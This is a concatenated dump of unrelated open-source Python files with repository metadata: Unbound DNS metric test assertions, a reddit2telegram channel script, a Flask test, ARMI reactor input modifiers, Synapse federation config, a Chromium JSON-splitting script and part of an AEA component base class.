aggregator.assert_metric(
'unbound.num.query.edns.DO', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.answer.rcode',
value=112675648,
tags=tags + ['rcode:NOERROR'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.answer.rcode',
value=18863,
tags=tags + ['rcode:SERVFAIL'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.answer.rcode',
value=91546007,
tags=tags + ['rcode:NXDOMAIN'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.answer.rcode.nodata',
value=48630830,
tags=tags,
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.answer.secure', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.answer.bogus', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.rrset.bogus', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.unwanted.queries', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.unwanted.replies', value=5, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
def assert_extended_stats_1_9_2(aggregator, tags):
thread0_tags = tags + ['thread:0']
aggregator.assert_metric(
'unbound.thread.num.queries', value=3, tags=thread0_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.queries_ip_ratelimited',
value=0,
tags=thread0_tags,
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.thread.num.cachehits', value=3, tags=thread0_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.cachemiss', value=0, tags=thread0_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.prefetch', value=0, tags=thread0_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.zero_ttl', value=0, tags=thread0_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.recursivereplies',
value=0,
tags=thread0_tags,
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.thread.requestlist.avg',
value=0,
tags=thread0_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.max',
value=0,
tags=thread0_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.overwritten',
value=0,
tags=thread0_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.exceeded',
value=0,
tags=thread0_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.current.all',
value=0,
tags=thread0_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.current.user',
value=0,
tags=thread0_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.recursion.time.avg',
value=0,
tags=thread0_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.recursion.time.median',
value=0,
tags=thread0_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.tcpusage', value=0, tags=thread0_tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
thread1_tags = tags + ['thread:1']
aggregator.assert_metric(
'unbound.thread.num.queries', value=1, tags=thread1_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.cachehits', value=0, tags=thread1_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.cachemiss', value=1, tags=thread1_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.prefetch', value=0, tags=thread1_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.zero_ttl', value=0, tags=thread1_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.recursivereplies',
value=1,
tags=thread1_tags,
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.thread.requestlist.avg',
value=0,
tags=thread1_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.max',
value=0,
tags=thread1_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.overwritten',
value=0,
tags=thread1_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.exceeded',
value=0,
tags=thread1_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.current.all',
value=0,
tags=thread1_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.current.user',
value=0,
tags=thread1_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.recursion.time.avg',
value=0.416939,
tags=thread1_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.recursion.time.median',
value=0,
tags=thread1_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.tcpusage', value=0, tags=thread1_tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
thread2_tags = tags + ['thread:2']
aggregator.assert_metric(
'unbound.thread.num.queries', value=1, tags=thread2_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.cachehits', value=1, tags=thread2_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.cachemiss', value=0, tags=thread2_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.prefetch', value=0, tags=thread2_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.zero_ttl', value=0, tags=thread2_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.recursivereplies',
value=0,
tags=thread2_tags,
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.thread.requestlist.avg',
value=0,
tags=thread2_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.max',
value=0,
tags=thread2_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.overwritten',
value=0,
tags=thread2_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.exceeded',
value=0,
tags=thread2_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.current.all',
value=0,
tags=thread2_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.current.user',
value=0,
tags=thread2_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.recursion.time.avg',
value=0,
tags=thread2_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.recursion.time.median',
value=0,
tags=thread2_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.tcpusage', value=0, tags=thread2_tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.total.num.queries', value=5, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.total.num.queries_ip_ratelimited',
value=0,
tags=tags,
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.total.num.cachehits', value=4, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.total.num.cachemiss', value=1, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.total.num.prefetch', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.total.num.zero_ttl', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.total.num.recursivereplies', value=1, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.total.requestlist.avg', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.total.requestlist.max', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.total.requestlist.overwritten',
value=0,
tags=tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.total.requestlist.exceeded', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.total.requestlist.current.all',
value=0,
tags=tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.total.requestlist.current.user',
value=0,
tags=tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.total.recursion.time.avg',
value=0.416939,
tags=tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.total.recursion.time.median', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.total.tcpusage', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.time.now', value=1561494094.953120, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.time.up', value=26.067263, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.time.elapsed', value=26.067263, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
# extended stats start here
aggregator.assert_metric(
'unbound.mem.cache.rrset', value=71423, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.mem.cache.message', value=67845, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.mem.mod.iterator', value=16588, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.mem.mod.validator', value=69288, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.mem.mod.respip', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.mem.streamwait', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.num.query.type',
value=5,
tags=tags + ['query_type:A'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.class',
value=5,
tags=tags + ['query_class:IN'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.opcode',
value=5,
tags=tags + ['opcode:QUERY'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.tcp', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.query.tcpout', value=7, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.query.tls', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.query.tls.resume', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.query.ipv6', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.query.flags',
value=0,
tags=tags + ['flag:QR'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.flags',
value=0,
tags=tags + ['flag:AA'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.flags',
value=0,
tags=tags + ['flag:TC'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.flags',
value=5,
tags=tags + ['flag:RD'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.flags',
value=0,
tags=tags + ['flag:RA'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.flags', value=0, tags=tags + ['flag:Z'], count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.query.flags',
value=0,
tags=tags + ['flag:AD'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.flags',
value=0,
tags=tags + ['flag:CD'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.edns.present', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.query.edns.DO', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.answer.rcode',
value=5,
tags=tags + ['rcode:NOERROR'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.answer.rcode',
value=0,
tags=tags + ['rcode:FORMERR'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.answer.rcode',
value=0,
tags=tags + ['rcode:SERVFAIL'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.answer.rcode',
value=0,
tags=tags + ['rcode:NXDOMAIN'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.answer.rcode',
value=0,
tags=tags + ['rcode:NOTIMPL'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.answer.rcode',
value=0,
tags=tags + ['rcode:REFUSED'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.ratelimited', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.answer.secure', value=5, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.answer.bogus', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.rrset.bogus', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.query.aggressive.NOERROR', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.query.aggressive.NXDOMAIN',
value=0,
tags=tags,
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.unwanted.queries', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.unwanted.replies', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.msg.cache.count', value=7, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.rrset.cache.count', value=8, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.infra.cache.count', value=3, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.key.cache.count', value=3, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.query.authzone.up', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.query.authzone.down', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
|
50269b399e9e774f6d2df4bb5e27cbe9536d5457
|
c268dcf432f3b7171be6eb307aafbe1bd173285a
|
/reddit2telegram/channels/rlebanon/app.py
|
fff3d8d734c2a25dd3e093780fce58c9127f6c9e
|
[
"MIT"
] |
permissive
|
Fillll/reddit2telegram
|
a7162da2cc08c81bcc8078ea4160d4ee07461fee
|
5d8ee3097e716734d55a72f5a16ce3d7467e2ed7
|
refs/heads/master
| 2023-08-09T10:34:16.163262
| 2023-07-30T18:36:19
| 2023-07-30T18:36:19
| 67,726,018
| 258
| 205
|
MIT
| 2023-09-07T02:36:36
| 2016-09-08T17:39:46
|
Python
|
UTF-8
|
Python
| false
| false
| 296
|
py
|
app.py
|
#encoding:utf-8
from utils import SupplyResult
subreddit = 'lebanon'
t_channel = '@RLebanon'
def send_post(submission, r2t):
if len(submission.comments.list()) < 40 and submission.score < 50:
return SupplyResult.DO_NOT_WANT_THIS_SUBMISSION
return r2t.send_simple(submission)
|
9076a6c715cd235f5eb4efeb5cffc707db462d69
|
675a6ed1aa824ac801783471e634e538d11acc8d
|
/tests/test_flask/test_g.py
|
ff97fc934b720957fd02630ba36c6d22dafaf04e
|
[
"MIT"
] |
permissive
|
Eastwu5788/pre-request
|
7ea50b3930252b5a0f99bf9588d0fdd8f4ae4562
|
42da2bf5edc6690983188e1ee013c810ef8985db
|
refs/heads/master
| 2023-05-24T22:53:04.353491
| 2022-01-26T02:03:57
| 2022-01-26T02:03:57
| 100,257,925
| 102
| 9
|
MIT
| 2023-05-23T03:10:20
| 2017-08-14T10:56:59
|
Python
|
UTF-8
|
Python
| false
| false
| 429
|
py
|
test_g.py
|
# !/usr/local/python/bin/python
# -*- coding: utf-8 -*-
# (C) Wu Dong, 2020
# All rights reserved
# @Author: 'Wu Dong <wudong@eastwu.cn>'
# @Time: '2020-04-20 10:08'
class TestG:
def test_g_smoke(self, client):
""" 测试通过flask g获取请求参数
"""
resp = client.get("/g", data={
"email": "wudong@eastwu.cn"
})
assert resp.json == {"email": "wudong@eastwu.cn"}
|
889fee1b21421be2e2507e3d748a4e6e0dbf23af
|
df4361db61d10a10c46ed5f18973d89e4efda82c
|
/armi/cases/inputModifiers/pinTypeInputModifiers.py
|
fcb21f4c79c278400299ae375b45f1d91eab1966
|
[
"Apache-2.0",
"GPL-1.0-or-later",
"BSD-3-Clause",
"LicenseRef-scancode-free-unknown"
] |
permissive
|
terrapower/armi
|
5524741c5e80781e136ea3422aed0db8398f76ae
|
360791847227df3f3a337a996ef561e00f846a09
|
refs/heads/main
| 2023-09-04T05:16:29.080518
| 2023-09-01T16:10:29
| 2023-09-01T16:10:29
| 218,863,590
| 204
| 75
|
Apache-2.0
| 2023-09-14T20:42:24
| 2019-10-31T21:18:34
|
Python
|
UTF-8
|
Python
| false
| false
| 5,392
|
py
|
pinTypeInputModifiers.py
|
# Copyright 2019 TerraPower, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from armi.cases.inputModifiers import inputModifiers
from armi.reactor import flags
from armi.reactor.components import component
from armi.reactor.converters import pinTypeBlockConverters
class _PinTypeAssemblyModifier(inputModifiers.InputModifier):
"""
Abstract class for modifying something about a pin, within a block.
This will construct blocks, determine if the block should be modified by checking
the ``_getBlockTypesToModify``, and then run ``_adjustBlock(b)``. The ``Blueprints``
are then updated based on the modification assuming that dimension names match
exactly to ComponenBlueprint attributes (which is true, because ComponentBlueprint
attributes are programmatically derived from Component constructors).
"""
def __init__(self, value):
inputModifiers.InputModifier.__init__(self, {self.__class__.__name__: value})
self.value = value
def __call__(self, cs, bp, geom):
for bDesign in bp.blockDesigns:
# bDesign construct requires lots of arguments, many of which have no impact.
# The following can safely be defaulted to meaningless inputs:
# axialIndex: a block can be reused at any axial index, modifications made
# dependent on will not translate back to the input in a meaningful
# fashion
# axialMeshPoints: similar to above, this is specified by the assembly, and
# a block can be within any section of an assembly.
# height: similar to above. a block can have any height specified by an
# assembly. if height-specific modifications are required, then a new
# block definition should be created in the input
# xsType: similar to above. a block can have any xsType specified through
# the assembly definition assembly. if xsType-specific modifications are
# required, then a new block definition should be created in the input
# materialInput: this is the materialModifications from the assembly
# definition. if material modifications are required on a block-specific
# basis, they should be edited directly
b = bDesign.construct(
cs,
bp,
axialIndex=1,
axialMeshPoints=1,
height=1,
xsType="A",
materialInput={},
)
if not b.hasFlags(self._getBlockTypesToModify()):
continue
self._adjustBlock(b)
for cDesign, c in zip(bDesign, b):
for dimName in c.DIMENSION_NAMES:
inpDim = getattr(cDesign, dimName)
newDim = getattr(c.p, dimName)
if isinstance(newDim, tuple):
# map linked component dimension
link = component._DimensionLink(newDim)
newDim = str(link)
if inpDim != newDim:
setattr(cDesign, dimName, newDim)
return cs, bp, geom
def _getBlockTypesToModify(self):
"""Hook method to determine blocks that should be modified."""
raise NotImplementedError
def _adjustBlock(self, b):
"""Hook method for `__call__` template method."""
raise NotImplementedError
class SmearDensityModifier(_PinTypeAssemblyModifier):
"""
Adjust the smeared density to the specified value.
This is effectively how much of the space inside the cladding tube is occupied by
fuel at fabrication.
"""
def _getBlockTypesToModify(self):
"""Hook method to determine blocks that should be modified."""
return flags.Flags.FUEL
def _adjustBlock(self, b):
"""Hook method for `__call__` template method."""
pinTypeBlockConverters.adjustSmearDensity(b, self.value)
class CladThicknessByODModifier(_PinTypeAssemblyModifier):
"""Adjust the cladding thickness by adjusting the inner diameter of all cladding components."""
FAIL_IF_AFTER = (SmearDensityModifier,)
def _getBlockTypesToModify(self):
"""Hook method to determine blocks that should be modified."""
return ""
def _adjustBlock(self, b):
pinTypeBlockConverters.adjustCladThicknessByOD(b, self.value)
class CladThicknessByIDModifier(_PinTypeAssemblyModifier):
"""Adjust the cladding thickness by adjusting the outer diameter of the cladding component."""
FAIL_IF_AFTER = (SmearDensityModifier,)
def _getBlockTypesToModify(self):
"""Hook method to determine blocks that should be modified."""
return ""
def _adjustBlock(self, b):
pinTypeBlockConverters.adjustCladThicknessByID(b, self.value)
|
252ee26905296ec8248b2c39f33e2f80c8027925
|
7343ece3b82ac87a594865c4074623b45b0297b4
|
/synapse/config/federation.py
|
97636039b8ad7746629d999b86868a4c35b4ed09
|
[
"Apache-2.0"
] |
permissive
|
matrix-org/synapse
|
a00111f83310783b78e2996557f8bbae4d9fb229
|
d35bed8369514fe727b4fe1afb68f48cc8b2655a
|
refs/heads/develop
| 2023-09-05T05:24:20.808942
| 2023-09-04T16:14:09
| 2023-09-04T16:14:09
| 22,844,864
| 12,215
| 2,869
|
Apache-2.0
| 2023-09-14T15:20:48
| 2014-08-11T15:51:42
|
Python
|
UTF-8
|
Python
| false
| false
| 3,643
|
py
|
federation.py
|
# Copyright 2020 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Any, Optional
from synapse.config._base import Config
from synapse.config._util import validate_config
from synapse.types import JsonDict
class FederationConfig(Config):
section = "federation"
def read_config(self, config: JsonDict, **kwargs: Any) -> None:
federation_config = config.setdefault("federation", {})
# FIXME: federation_domain_whitelist needs sytests
self.federation_domain_whitelist: Optional[dict] = None
federation_domain_whitelist = config.get("federation_domain_whitelist", None)
if federation_domain_whitelist is not None:
# turn the whitelist into a hash for speed of lookup
self.federation_domain_whitelist = {}
for domain in federation_domain_whitelist:
self.federation_domain_whitelist[domain] = True
federation_metrics_domains = config.get("federation_metrics_domains") or []
validate_config(
_METRICS_FOR_DOMAINS_SCHEMA,
federation_metrics_domains,
("federation_metrics_domains",),
)
self.federation_metrics_domains = set(federation_metrics_domains)
self.allow_profile_lookup_over_federation = config.get(
"allow_profile_lookup_over_federation", True
)
self.allow_device_name_lookup_over_federation = config.get(
"allow_device_name_lookup_over_federation", False
)
# Allow for the configuration of timeout, max request retries
# and min/max retry delays in the matrix federation client.
self.client_timeout_ms = Config.parse_duration(
federation_config.get("client_timeout", "60s")
)
self.max_long_retry_delay_ms = Config.parse_duration(
federation_config.get("max_long_retry_delay", "60s")
)
self.max_short_retry_delay_ms = Config.parse_duration(
federation_config.get("max_short_retry_delay", "2s")
)
self.max_long_retries = federation_config.get("max_long_retries", 10)
self.max_short_retries = federation_config.get("max_short_retries", 3)
# Allow for the configuration of the backoff algorithm used
# when trying to reach an unavailable destination.
# Unlike previous configuration those values applies across
# multiple requests and the state of the backoff is stored on DB.
self.destination_min_retry_interval_ms = Config.parse_duration(
federation_config.get("destination_min_retry_interval", "10m")
)
self.destination_retry_multiplier = federation_config.get(
"destination_retry_multiplier", 2
)
self.destination_max_retry_interval_ms = min(
Config.parse_duration(
federation_config.get("destination_max_retry_interval", "7d")
),
# Set a hard-limit to not overflow the database column.
2**62,
)
_METRICS_FOR_DOMAINS_SCHEMA = {"type": "array", "items": {"type": "string"}}
|
69a1ec3bdca6f5d53f1814db4f646f6cdf6c7e7d
|
a3d6556180e74af7b555f8d47d3fea55b94bcbda
|
/tools/traceline/traceline/scripts/split.py
|
6c046c8775838a7842b66de419902842a187d544
|
[
"BSD-3-Clause"
] |
permissive
|
chromium/chromium
|
aaa9eda10115b50b0616d2f1aed5ef35d1d779d6
|
a401d6cf4f7bf0e2d2e964c512ebb923c3d8832c
|
refs/heads/main
| 2023-08-24T00:35:12.585945
| 2023-08-23T22:01:11
| 2023-08-23T22:01:11
| 120,360,765
| 17,408
| 7,102
|
BSD-3-Clause
| 2023-09-10T23:44:27
| 2018-02-05T20:55:32
| null |
UTF-8
|
Python
| false
| false
| 656
|
py
|
split.py
|
#!/usr/bin/env python
# Copyright 2012 The Chromium Authors
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Splits a single json file (read from stdin) into separate files of 40k
records, named split.X.
"""
import sys
def main():
filecount = 0
count = 0
f = open('split.0', 'wb')
for l in sys.stdin:
if l == "},\r\n":
count += 1
if count == 40000:
f.write("}]);\r\n")
count = 0
filecount += 1
f = open('split.%d' % filecount, 'wb')
f.write("parseEvents([\r\n")
continue
f.write(l)
if __name__ == '__main__':
main()
|
9bdfc0779803e97bac068d2b74506335820425e2
|
ea57d267ab31480d8d731b2c095e9da9ad989133
|
/aea/components/base.py
|
76c264900587dc7932145eb34954018da03aaa70
|
[
"Apache-2.0"
] |
permissive
|
fetchai/agents-aea
|
6d034f1db6f3beacf31dac2f5a1baaa60c8edb7d
|
bec49adaeba661d8d0f03ac9935dc89f39d95a0d
|
refs/heads/main
| 2023-08-08T23:19:06.276643
| 2023-02-04T10:46:39
| 2023-02-04T10:46:39
| 203,558,879
| 192
| 58
|
Apache-2.0
| 2023-07-19T04:45:26
| 2019-08-21T10:12:47
|
Python
|
UTF-8
|
Python
| false
| false
| 6,532
|
py
|
base.py
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2023 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains definitions of agent components."""
import importlib.util
import logging
import sys
import types
from abc import ABC
from pathlib import Path
from typing import Any, Optional
from aea.configurations.base import (
ComponentConfiguration,
ComponentId,
ComponentType,
PublicId,
)
from aea.configurations.constants import PACKAGES
from aea.exceptions import AEAEnforceError
from aea.helpers.logging import WithLogger
_default_logger = logging.getLogger(__name__)
class Component(ABC, WithLogger):
"""Abstract class for an agent component."""
__slots__ = ("_configuration", "_directory", "_is_vendor")
def __init__(
self,
configuration: Optional[ComponentConfiguration] = None,
is_vendor: bool = False,
**kwargs: Any,
) -> None:
"""
Initialize a package.
:param configuration: the package configuration.
:param is_vendor: whether the package is vendorized.
:param kwargs: the keyword arguments for the logger.
"""
WithLogger.__init__(self, **kwargs)
self._configuration = configuration
self._directory = None # type: Optional[Path]
self._is_vendor = is_vendor
@property
def component_type(self) -> ComponentType:
"""Get the component type."""
return self.configuration.component_type
@property
def is_vendor(self) -> bool:
"""Get whether the component is vendorized or not."""
return self._is_vendor
@property
